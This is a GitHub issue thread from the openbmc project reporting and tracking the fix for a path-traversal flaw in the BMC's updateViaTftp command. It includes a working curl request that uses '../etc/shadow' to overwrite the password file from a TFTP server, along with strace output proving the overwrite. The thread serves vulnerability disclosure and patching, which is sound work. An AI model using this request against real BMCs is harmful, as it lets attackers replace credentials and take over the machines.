openbmc/openbmc #1898: [security] overwrite any file on the bmc with updateViaTftp

rfrandse, 2017-07-05:
@ya-mouse commented on [Wed Dec 07 2016](https://github.com/openbmc/skeleton/issues/133)

I've found a security hole that allows to override any bmc file via updateViaTftp command:
```
curl -v -b cjar -k -X POST -H "Content-Type: application/json" \
   -d '{"data": ["10.1.0.1", "../etc/shadow"]}' \
   https://10.1.0.102/org/openbmc/control/flash/bmc/acion/updateViaTftp
```
This will override /etc/shadow on the bmc with the user's content from "etc/shadow" on tftp server.

Before exploiting:
```
# md5sum /etc/shadow
7f2131b66f559a79b7198b64a8577048 /etc/shadow
```
Here is a part of strace log from /usr/sbin/download_manager.py process:
```
[pid  2520] open("/tmp/../etc/shadow", O_WRONLY|O_CREAT|O_TRUNC, 0666) = 4
[pid  2520] sendto(3, "\0\1../etc/shadow\0octet\0", 22, 0, {sa_family=AF_INET, sin_port=htons(69), sin_addr=inet_addr("10.1.0.1")}, 16) = 22
[pid  2520] recvfrom(3, "\0\3\0\1root:$1$UGMqyqdG$FZiylVFmRRf"..., 516, 0, {sa_family=AF_INET, sin_port=htons(50237), sin_addr=inet_addr("10.1.0.1")}, [16]) = 516
[pid  2520] connect(3, {sa_family=AF_INET, sin_port=htons(50237), sin_addr=inet_addr("10.1.0.1")}, 16) = 0
[pid  2520] write(4, "root:$1$UGMqyqdG$FZiylVFmRRfl9Z0"..., 512) = 512
[pid  2520] sendto(3, "\0\4\0\1", 4, 0, {sa_family=AF_INET, sin_port=htons(50237), sin_addr=inet_addr("10.1.0.1")}, 16) = 4
[pid  2520] read(3, "\0\3\0\2:*:17141:0:99999:7:::\navahi:"..., 516) = 133
[pid  2520] write(4, ":*:17141:0:99999:7:::\navahi:!:17"..., 129) = 129
```
After upload:
```
# md5sum /etc/shadow
28f761c4178e7f709a5bdce6943c4496  /etc/shadow
```

---

@williamspatrick commented on [Thu Dec 08 2016](https://github.com/openbmc/skeleton/issues/133#issuecomment-265801988)

We plan to get rid of download_manager.py in its current form.  I'll look and see if there is an easy way to clean this up now though.

---

@ya-mouse commented on [Thu Dec 08 2016](https://github.com/openbmc/skeleton/issues/133#issuecomment-265806817)

just get basename for filename in:
https://github.com/openbmc/skeleton/blob/master/pydownloadmgr/download_manager.py#L59
or use temporary names.

---

@williamspatrick commented on [Tue Apr 25 2017](https://github.com/openbmc/skeleton/issues/133#issuecomment-297140425)

Once we get the new TFTP server in we should disable the one from skeleton.  When that happens this issue can be closed.  We are ensuring the new TFTP server does not have this issue.

gtmills, 2017-09-05:
The new TFTP, DownloadViaTFTP() at /xyz/openbmc_project/software, does not have this vulnerability.

rfrandse, 2017-09-05:
<https://gerrit.openbmc-project.xyz/6420> Remove obmc-mgr-download.bb
Resolves  #1898 [security] overwrite any file on the bmc with updateViaTftp

williamspatrick, 2017-09-14:
The DownloadViaTFTP interfaces are only used with the "new style" code update.  Some machines are not moving to that.

rfrandse, 2017-10-02:
Removed committed sprints. This has been in an iterative process the first commit on 9/5 when review caused a total change in direction on what needed to be done and Gunnar really hasn't been able to commit to finishing this Story.

closed 2017-10-24 by geissonator

gtmills, 2018-05-23:
https://gerrit.openbmc-project.xyz/#/c/7117/ fixed this